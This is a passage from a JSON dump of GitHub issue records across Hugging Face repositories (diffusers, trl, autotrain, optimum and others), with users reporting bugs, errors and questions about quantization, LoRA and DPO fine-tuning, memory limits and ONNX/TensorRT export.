Platform: Linux-5.4.0-132-generic-x86_64-with-glibc2.31\r\n- Python version: 3.10.14\r\n- PyTorch version (GPU?): 2.2.2+cu118 (True)\r\n- Huggingface_hub version: 0.24.3\r\n- Transformers version: 4.43.3\r\n- Accelerate version: 0.33.0\r\n- xFormers version: 0.0.25.post1\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\r\n### Who can help?\r\n\r\n@sayakpaul @yiyixuxu ", "url": "https://github.com/huggingface/diffusers/issues/9180", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-08-14T14:43:15Z", "updated_at": "2025-11-18T13:22:52Z", "comments": 33, "user": "choidaedae" }, { "repo": "huggingface/diffusers", "number": 9174, "title": "[Quantization] bring quantization to diffusers core", "body": "Now that we have a working PoC (#9165) of NF4 quantization through `bitsandbytes` and also [this](https://huggingface.co/blog/quanto-diffusers) through `optimum.quanto`, it's time to bring in quantization more formally in `diffusers` \ud83c\udfb8\r\n\r\nIn this issue, I want to devise a rough plan to attack the integration. We are going to start with `bitsandbytes` and then slowly increase the list of our supported quantizers based on community interest. This integration will also allow us to do LoRA fine-tuning of large models like [Flux](https://huggingface.co/docs/diffusers/main/en/api/pipelines/flux) through `peft` ([guide](https://huggingface.co/docs/peft/en/developer_guides/quantization)). \r\n\r\nThree PRs are expected: \r\n\r\n- [ ] Introduce a [base quantization config class](https://github.com/huggingface/transformers/blob/main/src/transformers/quantizers/base.py) like we have in `transformers`. \r\n- [ ] Introduce `bitsandbytes` related utilities to handle processing, post-processing of layers for injecting `bitsandbytes` layers. Example is [here](https://github.com/huggingface/transformers/blob/main/src/transformers/integrations/bitsandbytes.py). \r\n- [ ] Introduce a `bitsandbytes` config ([example](https://github.com/huggingface/transformers/blob/main/src/transformers/quantizers/quantizer_bnb_4bit.py)) and quantization loader mixin aka `QuantizationLoaderMixin`. This loader will enable passing a quantization config to `from_pretrained()` of a `ModelMixin` and will tackle how to modify and prepare the model for the provided quantization config. This will also allow us to serialize the model according to the quantization config. \r\n\r\n--- \r\n\r\nNotes:\r\n\r\n* We could have done this with `accelerate` ([guide](https://huggingface.co/docs/accelerate/en/usage_guides/quantization)) but this doesn't yet support NF4 serialization. \r\n* Good example PR: https://github.com/huggingface/transformers/pull/32306\r\n\r\n---\r\n\r\n@DN6 @SunMarc sounds good? ", "url": "https://github.com/huggingface/diffusers/issues/9174", "state": "closed", "labels": [ "quantization" ], "created_at": "2024-08-14T08:05:34Z", "updated_at": "2024-10-21T04:42:46Z", "comments": 15, "user": "sayakpaul" }, { "repo": "huggingface/diffusers", "number": 9172, "title": "why rebuild a vae in inference stage? ", "body": "Thanks for ur effort for diffusion model. \r\n\r\nI want to know why we need to rebuild a vae in inference stage. I think it will introduce extra GPU cost.\r\nhttps://github.com/huggingface/diffusers/blob/a85b34e7fdc0a5fceb11aa0fa6199bd9afaca396/examples/text_to_image/train_text_to_image_sdxl.py#L1217C16-L1223C24\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/9172", "state": "open", "labels": [ "stale" ], "created_at": "2024-08-14T05:52:38Z", "updated_at": "2024-11-14T15:03:55Z", "comments": 2, "user": "WilliammmZ" }, { "repo": "huggingface/candle", "number": 2413, "title": "How to load multiple safetensors with json format", "body": "For such a task:\r\n\r\nhttps://huggingface.co/black-forest-labs/FLUX.1-dev/tree/main/transformer\r\n\r\nhow should safetensors be loaded?\r\n\r\n", "url": "https://github.com/huggingface/candle/issues/2413", "state": "open", "labels": [], "created_at": "2024-08-14T04:50:37Z", "updated_at": "2025-06-11T19:05:05Z", "user": "oovm" }, { "repo": "huggingface/diffusers", "number": 9170, "title": "sdxl and contronet must has a GPU memory more than 36G?", "body": "### Describe the bug\n\nhttps://github.com/huggingface/diffusers/blob/15eb77bc4cf2ccb40781cb630b9a734b43cffcb8/src/diffusers/pipelines/controlnet/pipeline_controlnet_sd_xl.py\r\nline73---line113\r\nI run the demo with 24G GPU, then OOM everytime.\r\nso I must run SDXl with 48G?\r\n\r\n\r\n@yiyixuxu @sayakpaul @DN6 tks\n\n### Reproduction\n\nFile \"/root/miniconda3/lib/python3.12/site-packages/torch/nn/modules/module.py\", line 1150, in convert\r\n return t.to(device, dtype if t.is_floating_point() or t.is_complex() else None, non_blocking)\r\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\ntorch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 26.00 MiB. GPU 0 has a total capacity of 23.65 GiB of which 7.56 MiB is free. Process 3431486 has 18.91 GiB memory in use. Process 3081991 has 4.72 GiB memory in use. Of the allocated memory 4.09 GiB is allocated by PyTorch, and 171.75 MiB is reserved by PyTorch but unallocated. If reserved but unallocated memory is large try setting PYTORCH_CUDA_ALLOC_CONF=expandable_segments:True to avoid fragmentation. See documentation for Memory Management (https://pytorch.org/docs/stable/notes/cuda.html#environment-variables)\n\n### Logs\n\n_No response_\n\n### System Info\n\n0.28?\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9170", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-14T01:46:35Z", "updated_at": "2024-11-13T08:49:22Z", "comments": 3, "user": "henbucuoshanghai" }, { "repo": "huggingface/trl", "number": 1927, "title": "how to use kto_pair loss in the latest version ?", "body": "I can see that kto_pair losstype is no longer available in the latest version of dpo trainer. You suggest to use ktotrainer instead. \r\nBut kto_pair loss worked much better than kto_trainer on my dataset, so how do I continue to use kto_pair if I'm using the latest version of the trl library?\r\nthanks a lot!", "url": "https://github.com/huggingface/trl/issues/1927", "state": "closed", "labels": [ "\ud83c\udfcb DPO", "\ud83c\udfcb KTO" ], "created_at": "2024-08-13T15:59:25Z", "updated_at": "2024-10-20T16:56:21Z", "user": "vincezengqiang" }, { "repo": "huggingface/autotrain-advanced", "number": 728, "title": "[BUG] Deprecated positional argument(s) used in SFTTrainer, please use the SFTConfig to set these arguments instead. How to mitigate this?", "body": "### Prerequisites\r\n\r\n- [X] I have read the [documentation](https://hf.co/docs/autotrain).\r\n- [X] I have checked other issues for similar problems.\r\n\r\n### Backend\r\n\r\nLocal\r\n\r\n### Interface Used\r\n\r\nCLI\r\n\r\n### CLI Command\r\n\r\n```\r\n!autotrain --config path-to.yml\r\n```\r\n\r\n```\r\ntask: llm-sft\r\nbase_model: teknium/OpenHermes-2.5-Mistral-7B\r\nproject_name: XXX\r\nlog: none\r\nbackend: local\r\n\r\ndata:\r\n path: /content\r\n train_split: train\r\n valid_split: null\r\n chat_template: null\r\n column_mapping:\r\n text_column: text\r\n\r\nparams:\r\n block_size: 256\r\n model_max_length: 512\r\n epochs: 1\r\n batch_size: 2\r\n lr: 3e-5\r\n peft: true\r\n quantization: int4\r\n target_modules: all-linear\r\n padding: right\r\n optimizer: adamw_torch\r\n scheduler: cosine\r\n gradient_accumulation: 1\r\n mixed_precision: none\r\n unsloth: true\r\n lora_r: 16\r\n lora_alpha: 16\r\n lora_dropout: 0\r\n\r\nhub:\r\n username: abc\r\n token: hf_XXX\r\n push_to_hub: false\r\n```\r\n\r\n### UI Screenshots & Parameters\r\n\r\n_No response_\r\n\r\n### Error Logs\r\n\r\n```\r\nLoading checkpoint shards: 100% 2/2 [01:21<00:00, 40.56s/it]\r\nINFO | 2024-08-13 04:46:20 | autotrain.trainers.clm.utils:get_model:666 - model dtype: torch.float16\r\nINFO | 2024-08-13 04:46:20 | autotrain.trainers.clm.train_clm_sft:train:37 - creating trainer\r\n/usr/local/lib/python3.10/dist-packages/huggingface_hub/utils/_deprecation.py:100: FutureWarning: Deprecated argument(s) used in '__init__': dataset_text_field, max_seq_length, packing. Will not be supported from version '1.0.0'.\r\n\r\nDeprecated positional argument(s) used in SFTTrainer, please use the SFTConfig to set these arguments instead.\r\n warnings.warn(message, FutureWarning)\r\n/usr/local/lib/python3.10/dist-packages/trl/trainer/sft_trainer.py:192: UserWarning: You passed a `packing` argument to the SFTTrainer, the value you passed will override the one in the `SFTConfig`.\r\n warnings.warn(\r\n/usr/local/lib/python3.10/dist-packages/trl/trainer/sft_trainer.py:280: UserWarning: You passed a `max_seq_length` argument to the SFTTrainer, the value you passed will override the one in the `SFTConfig`.\r\n warnings.warn(\r\n/usr/local/lib/python3.10/dist-packages/trl/trainer/sft_trainer.py:318: UserWarning: You passed a `dataset_text_field` argument to the SFTTrainer, the value you passed will override the one in the `SFTConfig`.\r\n warnings.warn(\r\n```\r\n\r\n### Additional Information\r\n\r\nI am not sure why this pops up. I know this is just a UserWarning and model is able to fine-tune ok, but is anything being affected? ", "url": "https://github.com/huggingface/autotrain-advanced/issues/728", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-13T05:00:10Z", "updated_at": "2024-08-13T12:31:19Z", "user": "jackswl" }, { "repo": "huggingface/diffusers", "number": 9164, "title": "the dog example of train_dreambooth_lora_flux.py can not convergence", "body": "### Describe the bug\r\n\r\n```\r\nexport MODEL_NAME=\"black-forest-labs/FLUX.1-dev\"\r\nexport INSTANCE_DIR=\"dog\"\r\nexport OUTPUT_DIR=\"trained-flux-lora\"\r\n\r\naccelerate launch train_dreambooth_lora_flux.py \\\r\n --pretrained_model_name_or_path=$MODEL_NAME \\\r\n --instance_data_dir=$INSTANCE_DIR \\\r\n --output_dir=$OUTPUT_DIR \\\r\n --mixed_precision=\"bf16\" \\\r\n --instance_prompt=\"a photo of sks dog\" \\\r\n --resolution=512 \\\r\n --train_batch_size=1 \\\r\n --gradient_accumulation_steps=4 \\\r\n --learning_rate=1e-5 \\\r\n --report_to=\"wandb\" \\\r\n --lr_scheduler=\"constant\" \\\r\n --lr_warmup_steps=0 \\\r\n --max_train_steps=500 \\\r\n --validation_prompt=\"A photo of sks dog in a bucket\" \\\r\n --validation_epochs=25 \\\r\n --seed=\"0\" \\\r\n --push_to_hub\r\n``` \r\nI follow this command to train lora of flux-dev and download the dog-example from huggingFace, but this setting could not get better result, the loss is normal\r\n![image](https://github.com/user-attachments/assets/bc8b5795-cec6-46ac-994a-cb032af2f749)\r\n\r\n\r\nthe dog-example look like this:\r\n \r\n![alvan-nee-9M0tSjb-cpA-unsplash](https://github.com/user-attachments/assets/9bc554e4-3421-4b98-8a19-ab4bc6d3eca2)\r\n\r\nbut my result look like below:\r\n![dog0 (6)](https://github.com/user-attachments/assets/c9410c6b-1d80-4cef-8991-bc8a21195da1)\r\n\r\nand don't use the lora to generate image of the same prompt look like below:\r\n![dog0](https://github.com/user-attachments/assets/959cc08f-2531-45be-80d7-291800dc4ab0)\r\n\r\n\r\n\r\n### Reproduction\r\n\r\n```\r\nimport torch\r\nfrom diffusers import FluxPipeline\r\n\r\npipe = FluxPipeline.from_pretrained(\"/opt/ml/volume/default/aigc/project/FLUX.1-dev\",torch_dtype=torch.bfloat16)\r\npipe.enable_model_cpu_offload()\r\npipe.lora_state_dict(\"/opt/ml/volume/default/aigc/project/diffusers/examples/dreambooth/trained-flux-lora/checkpoint-500\")\r\nprompts = []\r\nprompts.append(\"an sks dog\")\r\nindex = 0\r\nfor prompt in prompts:\r\n image = pipe(\r\n prompt=prompt,\r\n num_inference_steps=20,\r\n guidance_scale=7.5,\r\n max_sequence_length=512,\r\n width=1152,\r\n height=768\r\n ).images[0]\r\n save_file = \"dog\"+str(index)+'.png'\r\n index+=1\r\n image.save(save_file)\r\n```\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nubuntu 20.04\r\n\r\n### Who can help?\r\n\r\n@sayakpaul @linoytsaban ", "url": "https://github.com/huggingface/diffusers/issues/9164", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-13T03:08:10Z", "updated_at": "2024-08-13T10:23:23Z", "comments": 7, "user": "chongxian" }, { "repo": "huggingface/text-embeddings-inference", "number": 380, "title": "How do i deploy to vertex ?", "body": "How do i deploy to vertex ? I think i saw some feature=google setting in code which supports compatibility with vertex . Please guide.", "url": "https://github.com/huggingface/text-embeddings-inference/issues/380", "state": "closed", "labels": [], "created_at": "2024-08-12T17:15:30Z", "updated_at": "2024-10-17T10:19:02Z", "user": "pulkitmehtaworkmetacube" }, { "repo": "huggingface/trl", "number": 1916, "title": "How to Add PEFT to PPO Trainer or PPO Config", "body": "I am trying to realize RLHF through PPO.\r\n\r\nMay I ask how can I realize PEFT in RLHF/PPO. I can see this parameter in DPOTrainer. However, I cannot see that in PPOTrainer.\r\n", "url": "https://github.com/huggingface/trl/issues/1916", "state": "closed", "labels": [ "\u2728 enhancement", "\ud83e\uddd2 good second issue", "\ud83c\udfcb PPO" ], "created_at": "2024-08-12T01:02:07Z", "updated_at": "2024-11-18T10:54:10Z", "user": "ZhichaoWang970201" }, { "repo": "huggingface/trl", "number": 1915, "title": "How to dpo llava?", "body": "Thank you for great work!\r\n\r\nI do dpo llava using raw `/trl/examples/scripts/dpo_visual.py` code by using a command\r\n`CUDA_VISIBLE_DEVICES=0 accelerate launch examples/scripts/dpo_visual.py --dataset_name HuggingFaceH4/rlaif-v_formatted --model_name_or_path llava-hf/llava-1.5-7b-hf --per_device_train_batch_size 1 --gradient_accumulation_steps 64 --dataset_num_proc 32 --output_dir dpo_llava --bf16 --torch_dtype bfloat16 --gradient_checkpointing --use_peft --lora_target_modules=all-linear`\r\nhowever I got a error such as \r\n\r\n> multiprocess.pool.RemoteTraceback: \r\n> \"\"\"\r\n> Traceback (most recent call last):\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/multiprocess/pool.py\", line 125, in worker\r\n> result = (True, func(*args, **kwds))\r\n> ^^^^^^^^^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/datasets/utils/py_utils.py\", line 678, in _write_generator_to_queue\r\n> for i, result in enumerate(func(**kwargs)):\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/datasets/arrow_dataset.py\", line 3522, in _map_single\r\n> example = apply_function_on_filtered_inputs(example, i, offset=offset)\r\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/datasets/arrow_dataset.py\", line 3421, in apply_function_on_filtered_inputs\r\n> processed_inputs = function(*fn_args, *additional_args, **fn_kwargs)\r\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/trl/trainer/dpo_trainer.py\", line 808, in tokenize_row\r\n> prompt_tokens = self.processor(prompt, images=images, add_special_tokens=False)\r\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n> TypeError: LlavaProcessor.__call__() got an unexpected keyword argument 'add_special_tokens'\r\n> \"\"\"\r\n> \r\n> The above exception was the direct cause of the following exception:\r\n> \r\n> Traceback (most recent call last):\r\n> File \"/trl/examples/scripts/dpo_visual.py\", line 178, in \r\n> trainer = DPOTrainer(\r\n> ^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/huggingface_hub/utils/_deprecation.py\", line 101, in inner_f\r\n> return f(*args, **kwargs)\r\n> ^^^^^^^^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/trl/trainer/dpo_trainer.py\", line 529, in __init__\r\n> train_dataset = train_dataset.map(self.tokenize_row, num_proc=self.dataset_num_proc, writer_batch_size=10)\r\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/datasets/arrow_dataset.py\", line 602, in wrapper\r\n> out: Union[\"Dataset\", \"DatasetDict\"] = func(self, *args, **kwargs)\r\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/datasets/arrow_dataset.py\", line 567, in wrapper\r\n> out: Union[\"Dataset\", \"DatasetDict\"] = func(self, *args, **kwargs)\r\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/datasets/arrow_dataset.py\", line 3253, in map\r\n> for rank, done, content in iflatmap_unordered(\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/datasets/utils/py_utils.py\", line 718, in iflatmap_unordered\r\n> [async_result.get(timeout=0.05) for async_result in async_results]\r\n> ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/multiprocess/pool.py\", line 774, in get\r\n> raise self._value\r\n> TypeError: LlavaProcessor.__call__() got an unexpected keyword argument 'add_special_tokens'\r\n> Traceback (most recent call last):\r\n> File \"/root/anaconda3/bin/accelerate\", line 8, in \r\n> sys.exit(main())\r\n> ^^^^^^\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/accelerate/commands/accelerate_cli.py\", line 48, in main\r\n> args.func(args)\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/accelerate/commands/launch.py\", line 1106, in launch_command\r\n> simple_launcher(args)\r\n> File \"/root/anaconda3/lib/python3.12/site-packages/accelerate/commands/launch.py\", line 704, in simple_launcher\r\n> raise subprocess.CalledProcessError(returncode=process.returncode, cmd=cmd)\r\n> subprocess.CalledProcessError: Command '['/root/anaconda3/bin/python', 'examples/scripts/dpo_visual.py', '--dataset_name', 'HuggingFaceH4/rlaif-v_formatted', '--model_name_or_path', 'llava-hf/llava-1.5-7b-hf', '--per_device_train_batch_size', '1', '--gradient_accumulation_steps', '64', '--dataset_num_proc', '32', '--output_dir', 'dpo_llava', '--bf16', '--torch_dtype', 'bfloat16', '--gradient_checkpointing', '--use_peft', '--lora_target_modules=all-linear']' returned non-zero exit status 1.\r\n\r\nIs there a solution?", "url": "https://github.com/huggingface/trl/issues/1915", "state": "closed", "labels": [], "created_at": "2024-08-11T00:57:38Z", "updated_at": "2024-08-11T01:23:16Z", "user": "ooooohira" }, { "repo": "huggingface/transformers.js", "number": 887, "title": "VSCode Interpolation", "body": "### Question\n\nI'm finding that VSCode is extremely slow when reading type definitions from the `@xenova/transformers` path. Is there anything I might be doing wrong? I've noticed that it uses JS comments to define the types instead of a type definition file, is the issue I am having a known issue with using that type of markup?", "url": "https://github.com/huggingface/transformers.js/issues/887", "state": "closed", "labels": [ "question" ], "created_at": "2024-08-11T00:08:30Z", "updated_at": "2024-08-25T01:55:36Z", "user": "lukemovement" }, { "repo": "huggingface/diffusers", "number": 9140, "title": "Diffusers model not working as good as repo ckpt model", "body": "Hi,\nWhen I try to run the models stable diffusion v1-5 or Instructpix2pix through the diffusers pipeline and use .from_pretrained() it downloads the models from hugging face and I'm using the code to run inference given in hugging face, the results are not good at all in the sense that there is still noise in the generated images.\n\nBut when I run these models using their GitHub repo code and ckpt models given by them the outputs are very good.\n\nIs there any solution to this or any other way to use the diffusers library pipeline.\n\nAlso the diffusers.StableDiffusionInstructPix2PixPipeline does not have .from_single_file() option.\n\nThank you \n", "url": "https://github.com/huggingface/diffusers/issues/9140", "state": "closed", "labels": [ "stale" ], "created_at": "2024-08-09T09:34:30Z", "updated_at": "2024-12-14T12:13:15Z", "comments": 6, "user": "kunalkathare" }, { "repo": "huggingface/diffusers", "number": 9136, "title": "IP adapter output on some resolutions suffers in quality?", "body": "### Describe the bug\n\nI am running IP adapter for 768x1344 which is one of the sdxl listed resolutions. I find that the output quality is much less than say regular 768x768 generations. I've attached sample images and code below. In this experiment 1080x768 seemed to get best output, but its not one of the supported resolutions @asomo\r\n\r\n\r\n![fridge_fg](https://github.com/user-attachments/assets/da1a2b42-f44e-40e1-967d-140f98f0f7da)\r\n![fridge_bg](https://github.com/user-attachments/assets/5e936097-7981-43d7-9ad3-216674738360)\r\n![fridge_canny](https://github.com/user-attachments/assets/996ff817-dd25-4206-b78b-cf1e264e5b7b)\r\n![fridge_mask](https://github.com/user-attachments/assets/46c4f2e2-7dd3-4edc-8051-56f9a8e0555b)\r\n![fridge_inv_mask](https://github.com/user-attachments/assets/c2c56fdd-507b-4e06-b263-0aa98a3224db)\r\n\n\n### Reproduction\n\n\r\nimport torch\r\nfrom diffusers import StableDiffusionXLPipeline, StableDiffusionXLImg2ImgPipeline, ControlNetModel, StableDiffusionXLControlNetPipeline, AutoencoderKL, UniPCMultistepScheduler\r\nfrom diffusers.image_processor import IPAdapterMaskProcessor\r\nfrom transformers import CLIPVisionModelWithProjection\r\nfrom controlnet_aux import AnylineDetector\r\nimport cv2\r\nimport numpy as np\r\nfrom PIL import Image, ImageOps\r\nfrom huggingface_hub import hf_hub_download\r\n\r\ndef create_controlnet_pipes(image_encoder=None)->StableDiffusionXLControlNetPipeline:\r\n ## get controlnet\r\n controlnet = ControlNetModel.from_pretrained(\r\n \"diffusers/controlnet-canny-sdxl-1.0\",\r\n torch_dtype=torch.float16,\r\n use_safetensors=True,\r\n )\r\n pipe = StableDiffusionXLPipeline.from_single_file(\r\n \"sdxl model path\", \r\n add_watermarker=False, \r\n torch_dtype=torch.float16, \r\n variant=\"fp16\", \r\n use_safetensors=True,\r\n image_encoder=image_encoder,\r\n )\r\n pipe = StableDiffusionXLControlNetPipeline(\r\n controlnet=controlnet,\r\n **pipe.components,\r\n add_watermarker=False,\r\n )\r\n pipe = pipe.to(\"cuda\")\r\n return pipe\r\n\r\n\r\ndef canny(image):\r\n image = np.array(image)\r\n low_threshold = 100\r\n high_threshold = 200\r\n image = cv2.Canny(image, low_threshold, high_threshold)\r\n image = image[:, :, None]\r\n image = np.concatenate([image, image, image], axis=2)\r\n return Image.fromarray(image)\r\n\r\n\r\nif __name__ == '__main__':\r\n ## crop different values like 0,0,1080,768 or 0,0,1280,768\r\n ref_image = Image.open('images/fridge_fg.png').crop((0,0,1344,768))\r\n bg_ref_image = Image.open('images/fridge_bg.png').crop((0,0,1344,768))\r\n\r\n mask_new = Image.open('images/fridge_mask.png').convert('L').crop((0,0,1344,768))\r\n inv_mask = Image.open('images/fridge_inv_mask.png').convert('L').crop((0,0,1344,768))\r\n processor = IPAdapterMaskProcessor()\r\n mask_fg = processor.preprocess([mask_new])\r\n mask_fg = mask_fg.reshape(1, mask_fg.shape[0], mask_fg.shape[2], mask_fg.shape[3])\r\n\r\n mask_bg = processor.preprocess([inv_mask])\r\n mask_bg = mask_bg.reshape(1, mask_bg.shape[0], mask_bg.shape[2], mask_bg.shape[3])\r\n\r\n canny_pil = Image.open('images/fridge_canny.png').crop((0,0,1344,768))\r\n \r\n image_encoder = CLIPVisionModelWithProjection.from_pretrained(\r\n \"h94/IP-Adapter\",\r\n subfolder=\"models/image_encoder\",\r\n torch_dtype=torch.float16\r\n )\r\n pipe = create_controlnet_pipes(image_encoder=image_encoder)\r\n pipe.load_ip_adapter(\"h94/IP-Adapter\", subfolder=\"sdxl_models\", weight_name=[\"ip-adapter-plus_sdxl_vit-h.safetensors\", \"ip-adapter-plus_sdxl_vit-h.safetensors\"], use_safetensors=True)\r\n scale_config_fg = {'down':1, 'mid':1, 'up':1}\r\n scale_config_bg = {\"down\":0.7, 'mid':0.7, 'up':0.7}\r\n pipe.set_ip_adapter_scale([scale_config_fg, scale_config_bg])\r\n\r\n for idx in range(5):\r\n outputs = pipe(\r\n prompt='kitchen scene',\r\n image=canny_pil,\r\n ip_adapter_image=[ref_image, bg_ref_image],\r\n negative_prompt=\"monochrome, lowres, bad anatomy, worst quality, low quality, fuzzy, blurry\",\r\n guidance_scale=5,\r\n num_inference_steps=30,\r\n controlnet_conditioning_scale=0.53,\r\n cross_attention_kwargs={\"ip_adapter_masks\": [mask_fg, mask_bg]},\r\n num_images_per_prompt=1\r\n # generator=generator,\r\n ).images\r\n for image in outputs:\r\n image.save()\r\n # image.save(f'output_plus/fridge_ar_ctrlnet_1280_plus_{idx}.png')\r\n print('done')\r\n pipe.unload_ip_adapter()\r\n\r\n\r\n\n\n### Logs\n\n_No response_\n\n### System Info\n\nv0.28.2 diffusers\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/9136", "state": "open", "labels": [ "bug", "stale" ], "created_at": "2024-08-09T06:36:39Z", "updated_at": "2024-09-14T15:03:17Z", "comments": 2, "user": "darshats" }, { "repo": "huggingface/transformers.js", "number": 885, "title": "TimeSformer on the web", "body": "### Question\n\nGlad to see this repo! If I want to use TimeSformer on the web, any suggestion or guide for it? Where can I learn from this repo or it's a totally different things? Thanks in advance!", "url": "https://github.com/huggingface/transformers.js/issues/885", "state": "open", "labels": [ "question" ], "created_at": "2024-08-08T17:59:13Z", "updated_at": "2024-08-11T09:02:47Z", "user": "tomhsiao1260" }, { "repo": "huggingface/cookbook", "number": 163, "title": "Incorrect markdown table rendering in Colab in \"How to use Inference Endpoints to Embed Documents\"", "body": "There is an issue with the rendering of the Inference Endpoints table in Colab in [How to use Inference Endpoints to Embed Documents](https://huggingface.co/learn/cookbook/automatic_embedding_tei_inference_endpoints). Although the table correctly renders on HF cookbook webpage:\r\n\r\n\"image\"\r\n\r\nwhen opening with Colab with the upper \"Open in Colab\" button, the rows are rendered incorrectly:\r\n\r\n\"image\"\r\n", "url": "https://github.com/huggingface/cookbook/issues/163", "state": "closed", "labels": [], "created_at": "2024-08-08T11:16:40Z", "updated_at": "2024-08-08T16:22:48Z", "user": "sergiopaniego" }, { "repo": "huggingface/alignment-handbook", "number": 192, "title": "Constant training loss in the model adapter card", "body": "Hello,\r\n\r\nI could fine-tune a model using a small dataset and I see that the validation loss decreases, while the training loss remains the same in the model card.\r\n\r\nI don't think this is normal, even though the new task I try to teach the model is similar to what it already does, I think it should be able to learn from the dataset. I took a look at the trainer_state.json file created during the fine-tuning process and I saw that the training_loss for step 2 is different from the one displayed in the model card.\r\n\r\n**Results from model_card:**\r\n\r\n|Training Loss | Epoch \t| Step \t | Validation Loss|\r\n|-------|-------|-------|-------|\r\n|1.3185 \t | 1.0 \t| 1 |\t 1.4256|\r\n|1.3185 \t | 1.1429 \t| 2 \t | 1.3196|\r\n\r\n**Results from the trainer_state.json:**\r\n\r\n\"log_history\": [\r\n {\r\n \"epoch\": 1.0,\r\n \"grad_norm\": 1.1992276906967163,\r\n \"learning_rate\": 0.0002,\r\n \"loss\": 1.3185,\r\n \"step\": 1\r\n },\r\n {\r\n \"epoch\": 1.0,\r\n \"eval_loss\": 1.4256268739700317,\r\n \"eval_runtime\": 1.7474,\r\n \"eval_samples_per_second\": 1.145,\r\n \"eval_steps_per_second\": 0.572,\r\n \"step\": 1\r\n },\r\n {\r\n \"epoch\": 1.1428571428571428,\r\n \"eval_loss\": 1.3196333646774292,\r\n \"eval_runtime\": 1.552,\r\n \"eval_samples_per_second\": 1.289,\r\n \"eval_steps_per_second\": 0.644,\r\n \"step\": 2\r\n },\r\n {\r\n \"epoch\": 1.1428571428571428,\r\n \"step\": 2,\r\n \"total_flos\": 823612516859904.0,\r\n \"train_loss\": 0.7439389228820801,\r\n \"train_runtime\": 27.974,\r\n \"train_samples_per_second\": 0.5,\r\n \"train_steps_per_second\": 0.071\r\n }\r\n\r\nDoes the training loss remain the same, or is there a problem with the model card generation?\r\n\r\n\r\nHave a nice day!", "url": "https://github.com/huggingface/alignment-handbook/issues/192", "state": "closed", "labels": [], "created_at": "2024-08-08T09:35:40Z", "updated_at": "2024-08-08T13:29:00Z", "comments": 1, "user": "Michelet-Gaetan" }, { "repo": "huggingface/optimum", "number": 1985, "title": "Correct example to use TensorRT?", "body": "### System Info\r\n\r\n```shell\r\noptimum: 1.20.0\r\nos: ubuntu 20.04 with RTX 2080TI\r\npython: 3.10.14\r\n```\r\n\r\n\r\n### Who can help?\r\n\r\n@michaelbenayoun @JingyaHuang @echarlaix \r\n\r\n### Information\r\n\r\n- [X] The official example scripts\r\n- [ ] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [X] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [ ] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\nI followed the doc [here](https://huggingface.co/docs/optimum/main/en/onnxruntime/usage_guides/gpu#tensorrtexecutionprovider). The below is my code:\r\n\r\n```python\r\nfrom transformers import AutoProcessor\r\nfrom optimum.onnxruntime import ORTModelForVision2Seq\r\n\r\nmodel = 'facebook/nougat-small'\r\nort_model = ORTModelForVision2Seq.from_pretrained(\r\n \"facebook/nougat-small\",\r\n export=True,\r\n provider=\"TensorrtExecutionProvider\",\r\n)\r\n\r\nassert ort_model.providers == [\"TensorrtExecutionProvider\", \"CUDAExecutionProvider\", \"CPUExecutionProvider\"]\r\nprocessor = AutoProcessor.from_pretrained(model)\r\nort_model.save_pretrained('./nougat-small-trt')\r\nprocessor.save_pretrained('./nougat-small-trt')\r\n```\r\n\r\nWhen running the code, the terminal looks like:\r\n\r\n```\r\n2024-08-08 16:31:02.881585368 [W:onnxruntime:Default, tensorrt_execution_provider.h:83 log] [2024-08-08 08:31:02 WARNING] onnx2trt_utils.cpp:403: One or more weights outside the range of INT32 was clamped\r\n```\r\n\r\nI waited for almost half an hour for exporting the model (RTX 2080TI). However, when I loaded it by the below code, it just repeated the same thing.\r\n\r\n```python\r\n session_options = ort.SessionOptions()\r\n session_options.graph_optimization_level = ort.GraphOptimizationLevel.ORT_ENABLE_ALL\r\n session_options.log_severity_level = 3\r\n trt_engine_cache = './nougat-small-trt-cache'\r\n os.makedirs(trt_engine_cache, exist_ok=True)\r\n provider_options = {\r\n 'trt_engine_cache_enable': True,\r\n 'trt_engine_cache_path': trt_engine_cache\r\n }\r\n self.model = ORTModelForVision2Seq.from_pretrained(\r\n 